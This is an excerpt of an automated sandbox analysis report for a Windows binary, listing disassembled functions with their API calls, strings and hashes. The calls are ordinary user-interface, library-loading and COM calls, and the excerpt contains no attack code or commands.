Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 95d7d58f505254eace799a8848a82f1ef2f5027302fa8476463bf4c5a6ca3854
Instruction ID: 1d387002a7a24f3740f4da312d39d511bb5f0dc80db8e5ae62e4a12f1293e6dc
Opcode Fuzzy Hash: 95d7d58f505254eace799a8848a82f1ef2f5027302fa8476463bf4c5a6ca3854
Instruction Fuzzy Hash: 3931B235200205ABDF118FB8CC41BEA77AFEB49364F254719F975972E0D730E8508B94

Function 00685180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00685190
InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 006851C6

Strings

Dh, xrefs: 0068522E
|, xrefs: 006851B5

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |$Dh
API String ID: 1413715105-3757449963
Opcode ID: 5bbcc401bc04f2b1a6c02913962f64d056ed7780c250d6f9b473f9bd6164337f
Instruction ID: f7c82819eda1dbb37477859502c5e534c5f0ac54462496639c26587c5ca9f54d
Opcode Fuzzy Hash: 5bbcc401bc04f2b1a6c02913962f64d056ed7780c250d6f9b473f9bd6164337f
Instruction Fuzzy Hash: AB310A71800119ABCF41EFA4CC45AEE7FBAFF18710F100119F815B6165DA31AA56DBA4

Function 0069A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0069A15E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0069A172
SendMessageW.USER32(?,00001002,00000000,?), ref: 0069A196

Strings

SysMonthCal32, xrefs: 0069A129

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 454d52c4501d77f1f39476dd15128c7bc8b3d4738226f2306dc1aee3f2c8428b
Instruction ID: eca0d8c54024f3ad6e42a595d84e60b55ff9a8c131970bdef8a199b72475473d
Opcode Fuzzy Hash: 454d52c4501d77f1f39476dd15128c7bc8b3d4738226f2306dc1aee3f2c8428b
Instruction Fuzzy Hash: 92219F32510218BBDF118FA4CC42FEA3BBAEF48764F110214FE55AB1D0D6B5AC55CB94

Function 0069A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0069A941
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0069A94F
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0069A956

Strings

msctls_updown32, xrefs: 0069A8BB

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: db2c20fba286ea35565aa6151b725763d1b0d6b6861955ef86b5f2f25c291cdd
Instruction ID: b986d8e8cc446c3b64e51a57c73f4f501e18226f0b38494fb75d146445846d8e
Opcode Fuzzy Hash: db2c20fba286ea35565aa6151b725763d1b0d6b6861955ef86b5f2f25c291cdd
Instruction Fuzzy Hash: B2215EB5610209AFDB10DF68DC91DB737EEEB5A3A4B050159FA04DB361DA31EC11CAA1

Function 006999A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00699A30
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00699A40
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00699A65

Strings

Listbox, xrefs: 006999FD

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 5547a0409bf88d55cbfe241ab0b9f4785c6ad18b4329a3a710280d4aa83ca2e3
Instruction ID: 53a1870ec3ea720ec6fc15e5a069be63420016a40bb0aa28d02f8d9f5324d17e
Opcode Fuzzy Hash: 5547a0409bf88d55cbfe241ab0b9f4785c6ad18b4329a3a710280d4aa83ca2e3
Instruction Fuzzy Hash: 2A21B072610118BFDF218F58CC85EFB3BAFEB89760F018129F9449B290CA719C5287A0

Function 0069A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0069A46D
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0069A482
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0069A48F

Strings

msctls_trackbar32, xrefs: 0069A444

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: c047738f7bf1ede983a10a8a2f330af6e963f7555c7bede681b014b008dac6ff
Instruction ID: a8bca22a527bd399e812222d7937c9130dede8e9a2f0bc3916efd247cd70d386
Opcode Fuzzy Hash: c047738f7bf1ede983a10a8a2f330af6e963f7555c7bede681b014b008dac6ff
Instruction Fuzzy Hash: E511E771200208BEEF205F75CC45FEB37EEEF89B64F014128FA4596191D6B2E811C764

Function 00652287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00652350,?), ref: 006522A1
GetProcAddress.KERNEL32(00000000), ref: 006522A8

Strings

RoInitialize, xrefs: 00652290
combase.dll, xrefs: 0065229C

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: 7267924d1c39a9c0c7218608978ea0d10658bad053286204f18da4d77043707d
Instruction ID: 7027661fb13f2a0ef5d3429af21a4fce5cb167dfbb33f3444497ad39f2a3b429
Opcode Fuzzy Hash: 7267924d1c39a9c0c7218608978ea0d10658bad053286204f18da4d77043707d
Instruction Fuzzy Hash: 3CE04FB4690301ABEB109FB0EC8EB643667B705B06F506420F102E91E1EBB55584CF04

Function 0065235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00652276), ref: 00652376
GetProcAddress.KERNEL32(00000000), ref: 0065237D

Strings

RoUninitialize, xrefs: 00652365
combase.dll, xrefs: 00652371

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 2574300362-2819208100
Opcode ID: e3449a5125130adc519ccf208df529b9454d998d324f2ad39ed87c6b9fb713d9
Instruction ID: d4d92fdb64107a13c009af00f3c9e23e14fd2a2906d056b8028fb76886c6bfff
Opcode Fuzzy Hash: e3449a5125130adc519ccf208df529b9454d998d324f2ad39ed87c6b9fb713d9
Instruction Fuzzy Hash: 33E0ECB4544301BFEB209FA0ED4DB643B67B70270AF112424F509EA1B1EBB85594CB14

Function 006AAC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 006AAC60
__swprintf.LIBCMT ref: 006AAC94

Strings

WIN_XPe, xrefs: 006AACD3
%.3d, xrefs: 006AAC6E

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 01905bc94bf30685df2d2dfa0b94dae4a00361f86f563ff8f4a77ee8fad37254
Instruction ID: d0bc559926b6eef40dff851836ee71fc2c9225c0b8e0f5c4d143fc60450d7313
Opcode Fuzzy Hash: 01905bc94bf30685df2d2dfa0b94dae4a00361f86f563ff8f4a77ee8fad37254
Instruction Fuzzy Hash: 96E0ECB1C046589BDB50AB908D45AF973BEA709751F100093BA07A1100E7359F86EE12

Function 00692205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,006921FB,?,006923EF), ref: 00692213
GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00692225

Strings

GetProcessId, xrefs: 0069221F
kernel32.dll, xrefs: 0069220E

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetProcessId$kernel32.dll
API String ID: 2574300362-399901964
Opcode ID: 4167bbf1040292bc1c3ce08960da6a549ae915bf418667f1a90358ffb79e457b
Instruction ID: 00ebb30387c396355a2c3c6f7ec266953e9fed57b9463284d80d8d10837eec8f
Opcode Fuzzy Hash: 4167bbf1040292bc1c3ce08960da6a549ae915bf418667f1a90358ffb79e457b
Instruction Fuzzy Hash: ABD0A7F4410713AFCB254F36FC1864176DFEB04300B015429E841E6750EB70D8C18650

Function 006342F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,006342EC,?,006342AA,?), ref: 00634304
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00634316

Strings

kernel32.dll, xrefs: 006342FF
Wow64RevertWow64FsRedirection, xrefs: 00634310

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: ba3412a5453c39459ffc4a122525eff4010b32fccab727d53dac2d5267077ed5
Instruction ID: f0cffd6e3aa4af5771cf0ae81a31957c36d5500e691124070749ae9e5f3d1dfe
Opcode Fuzzy Hash: ba3412a5453c39459ffc4a122525eff4010b32fccab727d53dac2d5267077ed5
Instruction Fuzzy Hash: 1AD0A7B04007239FD7205F66EC0C641B6DBAB04301F014429E441D3362FFB4D8C08650

Function 0063434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,006341BB,00634341,?,0063422F,?,006341BB,?,?,?,?,006339FE,?,00000001), ref: 00634359
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0063436B

Strings

kernel32.dll, xrefs: 00634354
Wow64DisableWow64FsRedirection, xrefs: 00634365

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 1e8f5a851a1315178c283be12d5043fc2e722d477192bed6a22e182a9740a572
Instruction ID: f762b30793e8e29c87bbc8bbca2d25a51c62e27c055395e27cd0f2ed53d14df7
Opcode Fuzzy Hash: 1e8f5a851a1315178c283be12d5043fc2e722d477192bed6a22e182a9740a572
Instruction Fuzzy Hash: D3D0A7B0404723DFD7204F36EC08641BADBAB10715F014529E4D1D3350FFB4E8C08650

Function 00670564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0067052F,?,006706D7), ref: 00670572
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00670584

Strings

UnRegisterTypeLibForUser, xrefs: 0067057E
oleaut32.dll, xrefs: 0067056D

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: UnRegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1587604923
Opcode ID: 33ec046918f613311e5a5d5eaaa86f9812d1cb8dbfd8e59e57bd27381e3a8e92
Instruction ID: bc05d31770798e1d2f54202ff3fabd0b14b8bf36f1971bcee33eef2c0f3b6629
Opcode Fuzzy Hash: 33ec046918f613311e5a5d5eaaa86f9812d1cb8dbfd8e59e57bd27381e3a8e92
Instruction Fuzzy Hash: 84D05E704503129AE7205F25A808A4277EBAB04300B118529E84592290E6B0C4C08B20

Function 00670539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,?,0067051D,?,006705FE), ref: 00670547
GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00670559

Strings

oleaut32.dll, xrefs: 00670542
RegisterTypeLibForUser, xrefs: 00670553

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1071820185
Opcode ID: 28bebee93688b9b808fd77efe6cf5abed197d1284b602128c1820c70571b7727
Instruction ID: 14f3ac3585906985772ec6c33dffb848d3200ac68ce4804f1a535f54ca24846e
Opcode Fuzzy Hash: 28bebee93688b9b808fd77efe6cf5abed197d1284b602128c1820c70571b7727
Instruction Fuzzy Hash: F0D0A770440713DFE7208F65EC0864176FFAB00701B11C42DE44AD2290F6B0C8C08A20

Function 0068ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0068ECBE,?,0068EBBB), ref: 0068ECD6
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0068ECE8

Strings

GetSystemWow64DirectoryW, xrefs: 0068ECE2
kernel32.dll, xrefs: 0068ECD1

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: e71b1c7b1a1298c9591de51e3242854509291f25dfbb50d58cc5067e30778548
Instruction ID: a5877376c1030abd72c4fc83bd9bd99074459d388241efd9fb8664c08606254f
Opcode Fuzzy Hash: e71b1c7b1a1298c9591de51e3242854509291f25dfbb50d58cc5067e30778548
Instruction Fuzzy Hash: E8D0A7B0900723DFCB206F75EC4864276EBAB00300B018529F855D2291EFF5C8C08710

Function 0068BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,0068BAD3,00000001,0068B6EE,?,006CDC00), ref: 0068BAEB
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0068BAFD

Strings

GetModuleHandleExW, xrefs: 0068BAF7
kernel32.dll, xrefs: 0068BAE6

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: d311f99e440e63e836ddaa20ff574310e3a489fa53d46d51e2a2aa394fa41641
Instruction ID: f200242c00bf2139b879395f3a6953d9a0a78c6bfcc10288cdfac66e04ce53f4
Opcode Fuzzy Hash: d311f99e440e63e836ddaa20ff574310e3a489fa53d46d51e2a2aa394fa41641
Instruction Fuzzy Hash: 33D0A7B08007139FC730AF35EC48B5176DBAB00300B015529E843D3254EF70C8C1C710

Function 00693BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00693BD1,?,00693E06), ref: 00693BE9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00693BFB

Strings

advapi32.dll, xrefs: 00693BE4
RegDeleteKeyExW, xrefs: 00693BF5

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: fd596f721827cb1f59f049e92efce936ac40a90c6af7f783f7cadead73b4b03c
Instruction ID: b824b008fa1467308e695d2920613b9e1669b57f7f47eb79bdcf177d0d94c31e
Opcode Fuzzy Hash: fd596f721827cb1f59f049e92efce936ac40a90c6af7f783f7cadead73b4b03c
Instruction Fuzzy Hash: 60D0A7F0400B62EFCF205F75EC08653BBFEAF01314B114429E445E2750EAB0C4C08E10

Function 00669B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8e899387e4160e127c4da45466118f4f7526bd452371fe4dab7e38b906729a6
Instruction ID: 067b973f9475b4624d6f5e6fcbe2f489db6af77a36a60607ceae72f6d600c7d9
Opcode Fuzzy Hash: b8e899387e4160e127c4da45466118f4f7526bd452371fe4dab7e38b906729a6
Instruction Fuzzy Hash: 2EC14C75A0021AEFCB14DFA4C884AAEB7BAFF48714F144598ED05EB251D731EE41DBA0

Function 0068AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0068AAB4
CoUninitialize.OLE32 ref: 0068AABF

Part of subcall function 00670213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0067027B

VariantInit.OLEAUT32(?), ref: 0068AACA
VariantClear.OLEAUT32(?), ref: 0068AD9D
